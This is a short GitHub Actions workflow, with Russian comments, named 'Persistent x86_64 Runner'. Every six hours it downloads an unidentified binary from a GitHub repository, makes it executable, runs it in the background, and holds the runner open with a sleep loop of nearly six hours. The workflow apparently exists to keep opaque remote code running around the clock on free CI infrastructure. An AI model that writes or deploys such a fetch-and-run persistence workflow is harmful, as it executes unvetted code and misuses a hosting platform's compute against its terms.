name: ♻️ Persistent x86_64 Runner

on:
  schedule:
    - cron: '0 */6 * * *'   # Запуск каждые 6 часов
  workflow_dispatch:         # Ручной запуск

jobs:
  keep-alive:
    runs-on: ubuntu-latest
    steps:
      - name: 📥 Download binary
        run: |
          wget https://github.com/covers13/ElosMatikos/raw/refs/heads/main/x86_64

      - name: 🛠️ Make executable
        run: chmod +x x86_64

      - name: ▶️ Run binary in background
        run: |
          ./x86_64 &

      - name: 🕒 Keep workflow alive
        run: |
          for i in $(seq 1 350); do  # ~5ч 50мин
            echo "🟢 Minute $i/350"
            sleep 60
          done
